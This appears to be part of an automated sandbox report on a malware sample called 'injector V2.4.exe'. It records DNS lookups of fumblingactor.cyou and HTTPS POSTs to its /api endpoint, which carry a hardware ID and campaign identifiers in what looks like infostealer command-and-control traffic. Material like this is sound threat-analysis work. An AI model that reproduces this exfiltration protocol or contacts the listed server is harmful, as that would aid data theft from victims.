Nov 21, 2024 16:52:14.961544037 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.961657047 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.961694002 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.961848021 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.961895943 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.962064981 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.962101936 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.962275028 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.962313890 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.962347031 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.962450027 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.962496996 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.962861061 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.963057995 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.963123083 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.963155985 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:15.007335901 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:15.007530928 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:15.007607937 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:15.007657051 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:15.055335045 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:15.055497885 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:15.103348970 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:15.297795057 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:17.144680977 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:17.144798040 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:17.144957066 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:17.144994020 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:17.165384054 CET	49726	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:17.165419102 CET	443	49726	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:17.165520906 CET	49726	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:17.165857077 CET	49726	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:17.165884018 CET	443	49726	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:18.362746000 CET	49726	443	192.168.2.5	172.67.219.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 16:51:58.383491039 CET	63597	53	192.168.2.5	1.1.1.1
Nov 21, 2024 16:51:58.614809036 CET	53	63597	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 16:51:58.383491039 CET	192.168.2.5	1.1.1.1	0x21ba	Standard query (0)	fumblingactor.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 16:51:58.614809036 CET	1.1.1.1	192.168.2.5	0x21ba	No error (0)	fumblingactor.cyou		172.67.219.199	A (IP address)	IN (0x0001)	false
Nov 21, 2024 16:51:58.614809036 CET	1.1.1.1	192.168.2.5	0x21ba	No error (0)	fumblingactor.cyou		104.21.24.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fumblingactor.cyou

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:00 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fumblingactor.cyou
2024-11-21 15:52:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-21 15:52:00 UTC	990	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mpvqh02l21ah17p0cinno8jfqb; expires=Mon, 17-Mar-2025 09:38:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fa6XHCSa%2F6wXuB5SoeCjA0yoCdzck1xPlxEaMh29JOLrvnb%2FT8WSqHvUZX38B71q3wBogRues4WecsB7ywKg3Cbc68eE5dPsuqkYr7OIQmRjDp5tQoHvkUkBv%2BxPfDeeuerjoqc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d8296fea0f67-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1654390&cwnd=243&unsent_bytes=0&cid=d4595dfc93be0770&ts=737&x=0"
2024-11-21 15:52:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-21 15:52:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:02 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: fumblingactor.cyou
2024-11-21 15:52:02 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--uoaywzyrlsoc&j=
2024-11-21 15:52:02 UTC	996	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cqmdgjomkhd2fvrms8n61k1isp; expires=Mon, 17-Mar-2025 09:38:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnTJqy72Bmo4jKp2a%2BiSZnv2htHT9K%2B5uvE%2B3ntnDw25F1I%2Fw4zHjmyu5FltfJBXE4Nrv31hfq4d5UkEyRGppNRpJIbCm%2Fs6HlY6kOV1NHJqz86KyTlcM%2F90wrzqFR8HasBVfbg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d8368e8418fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=956&delivery_rate=1661923&cwnd=128&unsent_bytes=0&cid=7f831048ee286126&ts=741&x=0"
2024-11-21 15:52:02 UTC	373	IN	Data Raw: 34 34 36 63 0d 0a 42 42 64 4a 56 67 46 36 31 34 2f 52 4a 70 43 6c 6f 64 31 64 6c 36 71 4b 6a 69 78 49 4a 73 43 37 72 6b 48 58 67 74 48 63 37 49 5a 2f 4e 54 39 30 4f 30 37 37 72 61 4a 44 73 70 2f 56 72 79 6a 79 68 71 6a 76 53 47 6f 63 70 74 72 43 4d 72 4b 75 38 36 71 42 70 44 35 78 4b 44 70 79 48 2f 75 74 74 46 36 79 6e 2f 71 6d 66 2f 4c 45 71 4c 51 4f 4c 55 79 69 32 73 49 6a 74 75 6d 2b 72 49 44 6c 62 48 73 75 50 6d 51 5a 73 2b 36 39 53 2f 58 41 78 4c 77 33 2b 63 50 6e 35 6b 46 71 43 75 4c 65 31 47 50 74 6f 4a 79 35 6d 4f 64 4a 64 6a 6f 39 49 77 66 37 39 50 4e 44 2f 6f 65 62 2f 7a 7a 79 79 4f 62 6f 53 43 4e 4f 71 4e 50 4b 49 72 50 6f 6f 62 57 4b 37 6d 78 31 4c 54 39 75 45 4b 66 6a 74 30 7a 2b 78 73 36 38 66 37 75 49 37 2f 51 4f 63 67 54 78 36 38 38 79 70 Data Ascii: 446cBBdJVgF614/RJpClod1dl6qKjixIJsC7rkHXgtHc7IZ/NT90O077raJDsp/VryjyhqjvSGocptrCMrKu86qBpD5xKDpyH/uttF6yn/qmf/LEqLQOLUyi2sIjtum+rIDlbHsuPmQZs+69S/XAxLw3+cPn5kFqCuLe1GPtoJy5mOdJdjo9Iwf79PND/oeb/zzyyOboSCNOqNPKIrPoobWK7mx1LT9uEKfjt0z+xs68f7uI7/QOcgTx688yp
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 45 4a 55 65 69 33 73 59 70 75 75 71 33 73 34 50 69 5a 6e 56 72 65 69 4d 66 72 61 33 72 42 4e 48 43 30 37 67 7a 34 34 72 53 72 46 46 6b 58 65 4c 65 77 47 50 74 6f 4c 75 37 6a 65 64 74 65 69 67 38 61 41 71 31 2f 37 56 4a 39 39 58 46 75 6a 48 2f 79 2f 72 6d 51 43 78 48 71 39 4c 46 4a 72 4c 6b 38 2f 44 4f 34 33 34 31 63 33 52 43 46 62 37 68 75 56 50 79 68 39 7a 78 4a 72 58 50 35 4b 77 57 61 6b 43 6a 33 63 30 6e 75 2b 36 33 73 6f 6a 71 61 33 6f 74 50 6d 4d 66 76 2b 57 37 52 66 2f 4d 7a 4c 38 36 2b 4d 7a 75 34 45 38 76 42 4f 79 5a 79 7a 76 31 75 50 4f 51 69 65 64 30 4e 78 34 33 62 52 61 79 2b 2f 4e 62 76 4e 36 44 75 44 4f 31 6b 4b 6a 69 53 79 56 57 6f 38 76 4a 4c 61 66 73 74 72 69 44 35 32 68 31 4c 6a 4e 75 46 72 50 71 73 45 7a 32 78 73 32 7a 4e 66 62 4d 36 36 Data Ascii: EJUei3sYpuuq3s4PiZnVreiMfra3rBNHC07gz44rSrFFkXeLewGPtoLu7jedteig8aAq1/7VJ99XFujH/y/rmQCxHq9LFJrLk8/DO4341c3RCFb7huVPyh9zxJrXP5KwWakCj3c0nu+63sojqa3otPmMfv+W7Rf/MzL86+Mzu4E8vBOyZyzv1uPOQied0Nx43bRay+/NbvN6DuDO1kKjiSyVWo8vJLafstriD52h1LjNuFrPqsEz2xs2zNfbM66
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 71 4e 33 4d 4a 4c 6a 6c 73 4c 6d 4e 36 57 46 2f 4a 54 4e 6e 46 4c 7a 67 74 55 54 31 77 38 61 74 4f 76 7a 45 35 4b 77 41 61 6b 4f 36 6d 5a 52 6a 6d 75 65 6c 76 61 48 6e 64 33 78 72 4b 79 30 42 39 65 71 2f 42 4b 71 48 78 4c 6f 33 2f 73 37 67 37 46 77 76 53 71 6e 59 78 69 57 30 37 62 2b 34 6a 75 56 6d 63 79 63 30 5a 42 2b 6e 2f 37 5a 43 34 4d 32 44 38 58 2f 79 30 4b 69 30 44 68 78 55 74 63 6a 61 59 59 44 6a 76 62 43 4a 38 69 5a 71 5a 53 30 6a 48 37 6d 74 36 77 54 35 78 38 2b 34 4e 2f 50 4d 34 4f 4e 42 49 31 61 6a 31 63 49 78 73 75 43 36 73 49 48 6f 62 33 67 73 4f 57 67 53 75 4f 6d 30 52 62 4b 4a 67 37 67 6e 74 5a 43 6f 32 6c 34 6e 53 49 7a 53 77 43 72 31 2f 2f 32 6e 7a 75 4e 71 4e 58 4e 30 5a 78 53 39 35 37 78 4e 2b 4d 33 4d 74 6a 2f 39 77 65 48 76 54 69 5a Data Ascii: qN3MJLjlsLmN6WF/JTNnFLzgtUT1w8atOvzE5KwAakO6mZRjmuelvaHnd3xrKy0B9eq/BKqHxLo3/s7g7FwvSqnYxiW07b+4juVmcyc0ZB+n/7ZC4M2D8X/y0Ki0DhxUtcjaYYDjvbCJ8iZqZS0jH7mt6wT5x8+4N/PM4ONBI1aj1cIxsuC6sIHob3gsOWgSuOm0RbKJg7gntZCo2l4nSIzSwCr1//2nzuNqNXN0ZxS957xN+M3Mtj/9weHvTiZ
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 41 79 53 31 66 47 66 74 4b 52 35 4f 7a 4a 30 5a 42 54 31 74 66 4e 49 38 63 76 4c 73 44 6e 38 78 4f 4c 6c 52 53 5a 50 70 74 58 46 4a 72 50 68 74 72 75 50 34 47 70 2f 4c 54 64 67 46 37 72 69 75 77 53 38 68 38 53 6e 66 36 32 49 7a 66 74 46 4a 45 4c 69 78 6f 49 36 39 65 65 2f 2f 74 61 6b 61 6e 77 74 4d 6d 59 55 74 4f 75 37 51 66 72 44 77 72 6b 35 39 73 66 73 36 55 38 6c 51 4b 37 58 78 69 4b 30 37 4c 69 78 68 65 45 6d 4f 32 73 7a 65 31 6a 74 72 59 4a 48 35 4e 44 54 73 33 2f 71 68 76 47 73 53 53 59 45 2b 70 6e 4e 4d 62 2f 71 76 62 75 42 34 57 56 36 4c 44 6c 6c 46 4c 2f 6b 75 30 4c 39 7a 74 47 38 4d 2f 76 50 35 75 42 41 4a 30 36 68 31 49 78 74 39 65 65 72 2f 74 61 6b 53 6e 49 6d 47 6d 67 55 73 71 32 73 43 75 75 48 78 4c 4e 2f 72 59 6a 6b 35 6b 49 6a 52 4b 76 63 Data Ascii: AyS1fGftKR5OzJ0ZBT1tfNI8cvLsDn8xOLlRSZPptXFJrPhtruP4Gp/LTdgF7riuwS8h8Snf62IzftFJELixoI69ee//takanwtMmYUtOu7QfrDwrk59sfs6U8lQK7XxiK07LixheEmO2sze1jtrYJH5NDTs3/qhvGsSSYE+pnNMb/qvbuB4WV6LDllFL/ku0L9ztG8M/vP5uBAJ06h1Ixt9eer/takSnImGmgUsq2sCuuHxLN/rYjk5kIjRKvc
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 4f 6c 74 59 50 6f 4a 6d 70 6c 4c 53 4d 66 75 61 33 72 42 50 54 49 79 72 77 77 39 4d 48 6b 34 55 73 6a 51 61 50 66 79 43 6d 2f 34 4c 57 34 6a 2b 46 73 64 69 6f 2b 61 68 2b 39 36 72 42 57 73 6f 6d 44 75 43 65 31 6b 4b 6a 46 53 54 68 4b 73 70 6e 54 62 61 79 67 74 4c 4c 4f 76 43 5a 78 49 54 74 6e 48 37 6e 72 74 6b 4c 2f 78 73 79 2b 50 2f 72 4d 34 2b 56 49 4b 30 6d 6e 31 4d 67 78 76 2b 75 38 73 6f 66 6f 61 7a 56 6c 64 47 51 41 39 62 58 7a 64 66 2f 4a 7a 62 67 70 74 64 65 6d 39 51 34 74 53 4f 4b 42 6a 43 4b 35 37 37 43 78 6a 65 64 6e 66 7a 6b 6d 62 78 47 39 36 4c 39 50 2f 4d 48 52 75 54 44 38 79 2b 76 6c 53 53 4a 49 71 4e 72 4c 59 2f 75 67 74 4b 62 4f 76 43 5a 57 50 43 52 75 57 4b 71 6a 71 67 54 31 79 34 50 6e 66 2f 33 46 34 4f 5a 4b 4c 55 6d 6c 33 38 55 78 76 Data Ascii: OltYPoJmplLSMfua3rBPTIyrww9MHk4UsjQaPfyCm/4LW4j+Fsdio+ah+96rBWsomDuCe1kKjFSThKspnTbaygtLLOvCZxITtnH7nrtkL/xsy+P/rM4+VIK0mn1Mgxv+u8sofoazVldGQA9bXzdf/Jzbgptdem9Q4tSOKBjCK577CxjednfzkmbxG96L9P/MHRuTD8y+vlSSJIqNrLY/ugtKbOvCZWPCRuWKqjqgT1y4Pnf/3F4OZKLUml38Uxv
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 4c 35 32 70 2b 4c 44 64 73 48 4c 7a 6a 75 6b 75 79 69 59 4f 34 4a 37 57 51 71 4d 31 56 4b 55 69 76 6d 64 4e 74 72 4b 43 30 73 73 36 38 4a 6e 6b 6c 4d 57 4d 53 73 2b 6d 32 51 76 6a 43 77 37 51 38 2b 73 7a 75 36 45 45 71 54 36 76 59 79 69 61 2f 36 37 57 7a 6a 65 4a 67 4e 57 56 30 5a 41 44 31 74 66 4e 6b 36 63 72 50 75 48 2f 71 68 76 47 73 53 53 59 45 2b 70 6e 48 4c 37 48 6e 73 37 4f 4e 37 47 4e 78 49 54 46 6a 45 4b 66 6c 73 30 50 67 31 63 4f 32 4f 76 6e 4c 36 4f 68 49 49 30 4b 68 33 59 78 74 39 65 65 72 2f 74 61 6b 53 33 6b 73 48 57 51 44 39 66 4c 39 58 62 4c 41 7a 2f 39 6e 74 63 6e 6a 35 6b 45 6e 52 36 54 61 78 79 61 2f 34 62 53 32 67 2f 5a 6c 65 69 51 77 59 78 65 7a 36 37 4a 4c 39 4d 44 4b 76 6a 66 79 69 4b 61 73 53 54 49 45 2b 70 6e 69 4a 4c 62 6b 38 36 Data Ascii: L52p+LDdsHLzjukuyiYO4J7WQqM1VKUivmdNtrKC0ss68JnklMWMSs+m2QvjCw7Q8+szu6EEqT6vYyia/67WzjeJgNWV0ZAD1tfNk6crPuH/qhvGsSSYE+pnHL7Hns7ON7GNxITFjEKfls0Pg1cO2OvnL6OhII0Kh3Yxt9eer/takS3ksHWQD9fL9XbLAz/9ntcnj5kEnR6Taxya/4bS2g/ZleiQwYxez67JL9MDKvjfyiKasSTIE+pniJLbk86
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 4c 52 4a 30 61 68 2b 75 2f 4b 56 4a 34 73 43 44 67 48 47 31 30 4b 69 30 44 68 39 48 72 4e 66 4c 4e 61 53 74 6c 4b 69 45 34 33 5a 79 50 44 73 6a 56 76 58 72 38 78 79 68 69 59 4f 37 4c 72 57 51 75 4c 34 56 66 78 66 31 69 5a 34 38 2b 2f 6e 7a 71 4d 36 38 4e 44 74 72 4a 69 4e 41 39 61 71 77 56 75 44 42 77 4b 6b 38 73 76 62 57 79 31 51 6e 51 72 58 49 38 68 32 79 2b 72 36 34 6d 66 55 71 59 43 67 36 62 52 2b 6a 72 66 30 45 2f 59 65 62 68 6e 2b 39 69 4e 65 69 44 6a 49 45 2b 70 6e 35 49 4c 76 75 74 4b 69 66 71 55 46 76 4a 6a 4a 30 43 66 57 6a 38 30 4b 79 6e 35 50 78 66 2f 48 5a 71 4c 51 65 65 42 2f 33 69 70 74 7a 35 2f 2f 39 70 38 37 79 4a 69 31 35 65 69 4d 4b 39 62 58 7a 41 2f 48 56 30 62 6b 38 34 38 75 76 30 6e 41 45 51 36 54 63 79 7a 50 33 7a 72 69 71 69 61 51 Data Ascii: LRJ0ah+u/KVJ4sCDgHG10Ki0Dh9HrNfLNaStlKiE43ZyPDsjVvXr8xyhiYO7LrWQuL4Vfxf1iZ48+/nzqM68NDtrJiNA9aqwVuDBwKk8svbWy1QnQrXI8h2y+r64mfUqYCg6bR+jrf0E/Yebhn+9iNeiDjIE+pn5ILvutKifqUFvJjJ0CfWj80Kyn5Pxf/HZqLQeeB/3iptz5//9p87yJi15eiMK9bXzA/HV0bk848uv0nAEQ6TcyzP3zriqiaQ
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 6e 4d 50 75 71 33 39 42 50 53 48 6d 2b 31 78 74 63 7a 35 72 42 5a 36 46 76 6d 4d 6e 33 54 6c 73 71 7a 77 6c 36 52 77 4e 58 4e 6d 4c 56 69 6e 72 65 73 45 74 63 54 52 72 54 6e 32 33 75 75 72 63 42 52 6a 72 4e 37 4e 4e 61 58 33 76 50 47 67 30 6b 64 4c 46 53 46 67 46 72 76 71 70 56 57 79 69 59 4f 77 66 36 33 78 71 4b 51 4f 46 51 72 69 77 59 78 37 39 64 57 77 73 49 44 6a 63 47 52 6d 45 32 30 66 74 50 75 6a 55 2f 32 49 37 59 6b 65 74 59 61 6f 36 67 35 79 46 75 79 5a 79 44 4c 31 75 4f 50 73 31 62 45 31 49 6e 74 6d 66 46 61 73 72 61 55 45 71 70 57 4e 2f 79 32 31 6b 4b 69 72 54 54 68 57 70 4e 72 61 49 50 4c 65 6a 5a 6d 41 34 32 64 6a 4f 7a 6c 76 4f 62 62 38 75 58 72 4d 30 73 43 78 4d 66 4c 65 2b 61 77 41 61 6b 76 69 67 66 56 6a 2f 61 43 4d 38 4d 37 38 4a 69 31 72 Data Ascii: nMPuq39BPSHm+1xtcz5rBZ6FvmMn3Tlsqzwl6RwNXNmLVinresEtcTRrTn23uurcBRjrN7NNaX3vPGg0kdLFSFgFrvqpVWyiYOwf63xqKQOFQriwYx79dWwsIDjcGRmE20ftPujU/2I7YketYao6g5yFuyZyDL1uOPs1bE1IntmfFasraUEqpWN/y21kKirTThWpNraIPLejZmA42djOzlvObb8uXrM0sCxMfLe+awAakvigfVj/aCM8M78Ji1r
2024-11-21 15:52:02 UTC	1369	IN	Data Raw: 6e 71 76 6b 6a 4d 2b 66 53 75 4f 4f 57 4b 7a 75 39 59 4b 51 54 73 6d 64 52 6a 37 61 43 65 72 49 6e 30 5a 54 63 48 4d 32 34 55 39 66 4c 39 58 62 4c 52 67 2b 64 73 75 34 6a 36 72 42 5a 71 41 36 48 4c 33 69 57 32 39 72 44 35 73 4e 70 4c 5a 79 77 6b 59 46 71 45 34 4c 64 53 35 38 54 54 75 41 48 4c 35 66 72 72 58 69 6b 47 68 2b 4f 4f 45 71 50 6a 73 37 43 4a 70 43 67 31 4d 33 51 37 57 4a 6a 2f 74 46 54 78 68 65 61 46 66 63 54 65 36 2b 78 41 4c 51 53 39 6c 39 56 6a 6f 36 44 72 37 63 43 6b 64 44 56 7a 64 43 51 57 75 4f 79 77 53 76 48 56 30 62 6b 38 34 38 75 76 30 6e 41 46 54 36 50 4a 77 54 4b 34 35 4b 57 41 73 4d 4e 67 63 43 77 4b 58 53 2b 6b 36 71 4d 47 31 4d 54 56 76 48 2b 37 69 50 43 73 46 6d 70 6a 70 4e 7a 4c 59 2f 75 67 74 2f 37 57 70 45 6c 2b 4b 69 52 75 43 Data Ascii: nqvkjM+fSuOOWKzu9YKQTsmdRj7aCerIn0ZTcHM24U9fL9XbLRg+dsu4j6rBZqA6HL3iW29rD5sNpLZywkYFqE4LdS58TTuAHL5frrXikGh+OOEqPjs7CJpCg1M3Q7WJj/tFTxheaFfcTe6+xALQS9l9Vjo6Dr7cCkdDVzdCQWuOywSvHV0bk848uv0nAFT6PJwTK45KWAsMNgcCwKXS+k6qMG1MTVvH+7iPCsFmpjpNzLY/ugt/7WpEl+KiRuC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:04 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=J6HYNMF79F9LGP59V7A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12848 Host: fumblingactor.cyou
2024-11-21 15:52:04 UTC	12848	OUT	Data Raw: 2d 2d 4a 36 48 59 4e 4d 46 37 39 46 39 4c 47 50 35 39 56 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 4a 36 48 59 4e 4d 46 37 39 46 39 4c 47 50 35 39 56 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 36 48 59 4e 4d 46 37 39 46 39 4c 47 50 35 39 56 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f Data Ascii: --J6HYNMF79F9LGP59V7AContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--J6HYNMF79F9LGP59V7AContent-Disposition: form-data; name="pid"2--J6HYNMF79F9LGP59V7AContent-Disposition: form-data; name="lid"LPnhqo--uo
2024-11-21 15:52:05 UTC	991	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c8bsaud1p7ohoosgk4vc35rcjv; expires=Mon, 17-Mar-2025 09:38:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dfpyRCzm4ksszKZMHuz%2FuqWSB%2Fs7bhG7Dn2EukbkKzvYvKVbhPlQ8qJHkHFqe1cW8FYRHcVDPMMN5LaPkKM9jQDU81zKI58xxRSvsNyQatEOB4t6rvsB5CuuzVBvxZINHt4A6As%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d8454e47159f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13791&delivery_rate=1814791&cwnd=175&unsent_bytes=0&cid=71005b58846c7365&ts=774&x=0"
2024-11-21 15:52:05 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-21 15:52:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49713	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:06 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BUIRWLP4LYVPBV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15060 Host: fumblingactor.cyou
2024-11-21 15:52:06 UTC	15060	OUT	Data Raw: 2d 2d 42 55 49 52 57 4c 50 34 4c 59 56 50 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 42 55 49 52 57 4c 50 34 4c 59 56 50 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 55 49 52 57 4c 50 34 4c 59 56 50 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 0d 0a 2d 2d 42 Data Ascii: --BUIRWLP4LYVPBVContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--BUIRWLP4LYVPBVContent-Disposition: form-data; name="pid"2--BUIRWLP4LYVPBVContent-Disposition: form-data; name="lid"LPnhqo--uoaywzyrlsoc--B
